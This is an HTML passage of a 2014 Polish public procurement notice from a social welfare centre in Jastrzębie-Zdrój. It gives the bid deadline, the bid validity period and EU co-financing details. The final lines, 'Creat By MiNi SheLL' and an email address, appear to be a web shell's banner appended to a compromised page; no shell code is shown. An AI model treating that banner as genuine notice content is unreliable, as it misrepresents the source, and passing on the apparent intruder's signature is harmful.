<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 12:00, miejsce: Ośrodek Pomocy Społecznej, ul. Opolska 9, 44-335 Jastrzębie-Zdrój pokój nr 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pod nazwą O KROK DO PRZODU współfinansowany przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego; Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie, 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com